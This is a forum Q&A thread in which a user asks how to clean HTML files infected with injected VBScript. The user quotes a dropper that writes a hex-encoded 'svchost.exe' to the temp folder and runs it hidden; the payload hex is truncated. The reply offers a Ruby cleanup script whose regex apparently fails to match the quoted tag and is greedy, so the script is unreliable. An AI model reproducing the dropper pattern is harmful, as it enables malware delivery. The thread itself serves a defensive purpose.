I have few html files on my computer, that I borrowed from a friend, unfortunately all the files are infected, they all have malicious vbscript code inserted into the source. I have 100s of files and can't edit the source for all files. Is there a way I can remove the malicious script and still get the data?
Edit: Here is the sample of the code
<script language="VBScript"><!--
DropFileName = "svchost.exe"
WriteData = "4D5A9000030000000400........................8CB03FA48CB03"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
Is it safe to upload it online?
There are lot of antivirus software that'll detect this virus and remove the infected html files.
You can ran the following ruby script which will detect that bad vbscript tag and remove it.
class VirusKiller
VIRUS_REG = /<SCRIPT Language=VBScript>[\s\w\W\d.]*<\/SCRIPT>/
def fix_html_virus(file)
return if File.extname(file) != '.html'
file_content = File.read(file)
clean_content = file_content.gsub(VIRUS_REG, '')
File.open(file, "w") { |new_file| new_file << clean_content }
end
def transverse_files(base)
Dir.foreach(base) do |file|
begin
next if file == '.' or file == '..'
if File.file?(base+file)
fix_html_virus base+file
else
transverse_files(base+file+'/')
end
rescue Exception => e
puts e.message
end
end
end
def run(root_path)
transverse_files root_path
end
end
VirusKiller.new.run ARGV[0]
Install Ruby, copy this script in some file( lets say virus_killer.rb ). Browse to location on this file in cmd( if you are in window ) and run this command.
ruby virus_killer.rb /path/to/infected_folder/